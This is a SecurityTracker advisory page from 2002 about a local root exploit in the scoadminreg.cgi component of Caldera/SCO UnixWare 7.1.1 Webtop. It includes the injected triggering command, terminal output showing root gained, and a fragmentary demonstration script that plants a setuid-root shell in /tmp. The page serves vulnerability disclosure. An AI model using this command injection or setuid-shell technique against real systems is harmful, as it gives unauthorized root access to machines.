Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   Scoadminreg (Webtop) Vendors:   Caldera/SCO
Caldera 'scoadminreg.cgi' Component of UnixWare Webtop Lets Local Users Execute Arbitrary Code with Root Privileges to Gain Root Access
SecurityTracker Alert ID:  1003329
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 23 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  

Description:   A vulnerability was reported in the scoadminreg.cgi component of the Caldera/SCO UnixWare Webtop application. A local user can obtain root level privileges on the system.

A local user can execute the scoadminreg utility with a '-c' command line switch and user-supplied program to cause a SCOadmin object registration error. It is reported that the user-supplied program can then be executed with effective root privileges.

According to the report, the following command will trigger the vulnerability (where '/tmp/jggm' is a program that will create a root-owned shell):

/opt/webtop/bin/i3un0212/cgi-bin/admin/scoadminreg.cgi -c /tmp/jggm;/tmp/jggm;

A demonstration exploit script is provided in the Source Message.

Impact:   A local user can cause arbitrary code to be executed with root privileges on the host.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error, Exception handling error, State error
Underlying OS:  UNIX (Open UNIX-SCO)
Underlying OS Comments:  UnixWare 7.1.1

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Fix) Re: Caldera 'scoadminreg.cgi' Component of UnixWare Webtop Lets Local Users Execute Arbitrary Code with Root Privileges to Gain Root Access
The vendor has issued a fix.

 Source Message Contents

Subject:  Unixware 7.1.1 scoadminreg.cgi local exploit

unixware:~> uname -a
UnixWare unixware 5 7.1.1 i386 x86at SCO 
unixware:~> id
uid=101(mearee) gid=1(other)
unixware:~> ./ 

jGgM root exploit


Manager: -c /tmp/jggm;/tmp/jggm;
ERROR: Cannot find a Webtop object associated 
with -c /tmp/jggm
ERROR: Could not add object  ()
RESULT: Error: Object ".../_ens/Org" already exists.
Location: /webtop/webtops/en_US/admin/scoadminre

# id
uid=101(mearee) gid=1(other) euid=0(root)

It can remote attack...maybe... :))

Korean Security Forum.

Here is file...




echo "jGgM root exploit"
echo ""
echo "Mail:"

if [ ! -x $SCOADMIN ]; then
   echo "$SCOADMIN file not found"
   exit 2;

cat >/tmp/jggm.c <<_EOF

   chown("/tmp/jGgM_Shell", 0, 0);
   chmod("/tmp/jGgM_Shell", 04755);

cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c

$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"

rm -rf /tmp/jggm /tmp/jggm.c


# end of file..


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, LLC